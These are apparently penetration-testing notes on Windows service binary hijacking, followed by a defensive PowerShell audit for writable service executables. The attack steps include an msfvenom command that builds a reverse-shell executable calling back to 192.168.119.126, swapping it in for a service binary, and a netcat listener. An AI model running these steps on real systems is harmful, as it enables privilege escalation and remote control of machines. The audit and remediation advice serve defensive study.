# Service Binary hijacking

* List scheduled tasks and running services together with the binary each one executes:
  * `schtasks /query /fo LIST /v`
  * `Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}`
* Check the permissions (full control or writable) on every binary found:
  * `icacls <full-path>`
  * `icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe`
* Transfer an adduser.exe executable and rename it to the name of the writable service binary
  * OR `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe`
* `sc.exe stop <service-name>`
* `sc.exe start <service-name>`
* `nc -nvlp 139` if a reverse-shell exe is used
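The permission check above done once per binary with `icacls` can be automated across every running service. The following PowerShell audit is an added example, not part of the original notes: it parses each service's PathName, reads the ACL of the executable, and reports any Write/Modify/Full Control entry granted to a low-privileged group, which is exactly the condition that makes the binary replaceable. The `$weakPrincipals` list and the helper name `Get-ServiceExePath` are assumptions; extend the list to match the local environment.

```powershell
# Added example (not from the original notes): audit running services whose
# executable is writable by low-privileged principals. Run it in the context
# of the account whose privileges you want to evaluate.

# Extract the executable path from a service PathName such as
#   "C:\Program Files\App\svc.exe" -k arg   or   C:\Tools\svc.exe -arg
function Get-ServiceExePath {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }   # quoted path
    return ($PathName -split ' ')[0]                              # unquoted path
}

# Principals that should never hold write rights on a service binary (assumed list)
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the file be overwritten or replaced
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.State -eq 'Running' -and $_.PathName } |
    ForEach-Object {
        $svc = $_
        $exe = Get-ServiceExePath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe)) { return }      # skip unresolvable paths
        $acl = Get-Acl -LiteralPath $exe
        foreach ($ace in $acl.Access) {
            # Flag Allow entries that grant a write-capable right to a weak principal
            if ($ace.AccessControlType -eq 'Allow' -and
                ([int]($ace.FileSystemRights -band $writeRights)) -ne 0 -and
                $weakPrincipals -contains $ace.IdentityReference.Value) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunAs     = $svc.StartName     # account the service runs as
                    Binary    = $exe
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    } | Format-Table -AutoSize
```

Each row is a service whose binary a standard user could replace; remediation is to remove the offending ACE (for example with `icacls <full-path> /remove:g <principal>`) and to check the containing directory for the same weakness, since a writable folder allows the binary to be renamed and swapped even when the file itself is locked down.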
